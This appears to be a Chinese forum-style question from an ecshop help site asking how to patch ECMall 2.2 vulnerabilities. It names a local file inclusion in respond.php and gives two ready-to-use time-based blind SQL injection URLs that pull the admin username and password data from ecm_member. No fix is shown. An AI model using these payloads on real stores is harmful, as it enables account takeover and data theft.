关于ecmall的漏洞怎样修复?
2016-07-07 16:49 来源:www.chinab4c.com 作者:ecshop专家
ECMall本地文件包含漏洞 respond.php 48行
可以通过旁注拿个shell,然后写个main.php到/tmp目录下,然后包含之 ----------------------------------------------------------------------------------------------------------------------------------------- ECMall 2.2延迟注射漏洞 app\groupbuy.app.php:26: 复制代码
/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23 /index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)-- ============================================================================================ 如何修复,请高手指教~ |
最近更新
常用插件
- ecshop使用手机验证码登陆
ecshop使用手机验证码登陆,这个功能很新颖,有些特殊的ecshop站点,他到...
- ecshop 手机注册验证插件
ecshop 手机注册验证插件 ,需要通过手机获短信,然后注册验证 价格:...
- ecshop根据订单批量发红包
ecshop根据订单批量发红包 ,大家肯定对ecshop红包不陌生,但是对ecshop订...
- ecshop中nginx实现url的重写
上几章为了让ecshop很好的在nginx上运行。我们搭配了ecshop的nginx下的工作...
- ecshop商品分类名称增加样
ecshop插件介绍:本插件可以方便在后台管理,为ecshop商品分类名称增加样...
ecshop热门问答
ecshop热门资料
ecshopreturn
ecshoplin
ecshopNEWER
ecshop充值卡插件
ecshop字符集
ecshop街道
ecshop免费邮箱
ecmall邮件登陆
ecshop新窗口打开
ecshop导出数据
ecshop非会员
ecshop郁闷
ecshop油滑
ecshop过来人
ecshop左区域
ecshop说明性
ecshoptmp
ecshop伦敦时间
ecshop模板无法识别
ecshop无缘无故
ecshop模范
ecshopECSHOP添加销量排序
ecshopappend
inputstream
ecshop国际快递
ecshop搜索关键词
ecshoplibrary
ecshopXMPP
ecshop滚动公告
ecshop来电